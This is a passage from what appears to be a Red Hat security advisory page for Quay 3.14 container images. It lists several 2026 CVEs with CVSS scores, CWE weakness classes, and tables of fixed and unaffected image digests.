Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64	—	Workaround

Threats

Impact Important

CVE-2026-33894

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CWE-347 - Improper Verification of Cryptographic Signature

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le	—	Vendor Fix fix Workaround

Known not affected 23 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64	—	Workaround

Threats

Impact Important

CVE-2026-34986

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-131 - Incorrect Calculation of Buffer Size

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le	—	Vendor Fix fix Workaround

Known not affected 23 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64	—	Workaround

Threats

Impact Important

CVE-2026-39892

7.3 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

CWE-131 - Incorrect Calculation of Buffer Size

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le	—	Vendor Fix fix Workaround

Known not affected 23 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64	—	Workaround

Threats

Impact Important

CVE-2026-40192

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-409 - Improper Handling of Highly Compressed Data (Data Amplification)

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le	—	Vendor Fix fix Workaround

Known not affected 23 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64	—	Workaround

Threats

Impact Important

CVE-2026-40895

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CWE-212 - Improper Removal of Sensitive Information Before Storage or Transfer

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le	—	Vendor Fix fix

Known not affected 23 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le		—
